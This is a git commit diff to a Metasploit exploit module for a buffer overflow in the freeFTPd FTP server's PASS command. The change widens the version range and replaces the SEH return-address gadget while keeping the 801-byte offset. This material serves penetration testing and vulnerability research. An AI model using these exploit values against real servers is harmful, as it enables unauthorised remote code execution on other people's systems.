changed seh address to work on freeFTPd 1.0.10 and below

bug/bundler_fix
TecR0c 2013-09-27 12:35:03 +10:00
parent a6e1bc61ec
commit 5fc98481a7
1 changed files with 3 additions and 3 deletions

View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "freeFTPd 1.0.10 (PASS Command)",
'Name' => "freeFTPd 1.0.10 and below (PASS Command)",
'Description' => %q{
freeFTPd contains an overflow condition that is triggered as user-supplied input
is not properly validated when handling a specially crafted PASS command. This
@ -43,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => [ ARCH_X86 ],
'Targets' =>
[
['freeFTPd 1.0.10 on Windows Desktop Version',
['freeFTPd 1.0.10 and below on Windows Desktop Version',
{
'Ret' => 0x004142f0, # pop ebp # pop ebx # ret 0x04 [FreeFTPDService.exe]
'Ret' => 0x004014bb, # pop edi # pop esi # ret 0x04 [FreeFTPDService.exe]
'Offset' => 801,
}
],